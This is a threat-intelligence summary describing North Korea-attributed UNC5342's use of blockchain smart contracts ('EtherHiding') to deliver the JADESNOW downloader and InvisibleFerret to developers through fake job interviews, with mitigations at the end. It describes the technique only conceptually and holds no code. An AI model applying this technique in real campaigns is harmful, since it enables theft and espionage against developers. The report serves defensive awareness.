Full Report
North Korean hackers were observed employing the 'EtherHiding' tactic to deliver malware, steal cryptocurrency, and perform espionage with stealth and resilience. [...]
Analysis Summary
# Threat Actor: UNC5342
## Attribution & Identity
Nation-state threat actor attributed to North Korea (DPRK). Tracked internally by Google Threat Intelligence Group (GTIG) as **UNC5342**.
## Activity Summary
UNC5342 actors have been employing the "EtherHiding" technique since February in operations codenamed **Contagious Interview**. This technique leverages smart contracts on public blockchains (Ethereum or BNB Smart Chain) to host and deliver malware payloads during social engineering campaigns, primarily targeting software and web developers with fake job interview offers.
## Tactics, Techniques & Procedures
- **Malware Distribution via Blockchain:** Utilizing the **EtherHiding** technique where malicious scripts are embedded within smart contracts on the Ethereum or BNB Smart Chain.
- **Social Engineering:** Initiating attacks through fake job interviews using fabricated entities such as BlockNovas LLC, Angeloper Agency, and SoftGlide LLC.
- **Execution Flow:** Victims are tricked into running provided code during a technical assessment, which executes a JavaScript downloader.
- **Payload Delivery:** The smart contract hosts the **JADESNOW** downloader, which interacts with Ethereum to fetch the third-stage payload.
- **In-Memory Execution:** The final payload runs in memory, which hinders traditional static analysis.
- **Stealth:** Payloads are fetched via read-only calls, leaving no visible transaction history.
- **Persistent Command and Control (C2):** The malware listens for C2 commands to execute arbitrary commands or exfiltrate files.
- **Data Exfiltration:** Files are prepared and exfiltrated, often in ZIP form, to an external server or Telegram.
- **Payload Flexibility:** The use of multiple blockchains (Ethereum and BNB Smart Chain) suggests operational compartmentalization and flexibility in retrieving payloads. Contract updates (up to 20 times in four months observed) are cheap and frequent, allowing easy configuration changes.
## Targeting
- **Sectors:** Software and web development industries.
- **Geography:** Not explicitly stated, but typical of DPRK operations targeting global entities.
- **Victims:** Software and web developers solicited via fake job offers.
## Tools & Infrastructure
- **Malware Families Used:**
- **JADESNOW:** A JavaScript downloader used as the initial stage to fetch further components.
- **InvisibleFerret (JavaScript version):** The primary third-stage payload used for long-term espionage functions.
- **Credential Stealer Component:** A secondary malware component designed to steal sensitive information.
- **Infrastructure:**
- **Malware Hosting:** Public blockchains (Ethereum and BNB Smart Chain) used via smart contracts.
- **Exfiltration Channel:** Telegram and external servers.
- **Fabricated Entities:** BlockNovas LLC, Angeloper Agency, SoftGlide LLC.
## Implications
The adoption of EtherHiding by a state-sponsored actor like UNC5342 marks a significant development in malware distribution complexity. The technique provides high anonymity, resilience against takedown procedures, and cost-effective payload manipulation, making tracking and disruption of these campaigns much harder for defenders. The targeting of developers via supply chain-like social engineering vectors also poses broader risks.
## Mitigations
- Individuals should exercise extreme caution when asked to download or execute files during job application or interview processes.
- Test all received files, especially scripts, in isolated environments before execution.
- Administrators should enforce download restrictions for risky file types (.EXE, .MSI, .BAT, .DLL) on Chrome Enterprise.
- Assume full control over browser updates to prevent tampering.
- Implement strict web access and script execution policies (e.g., CSP hardening).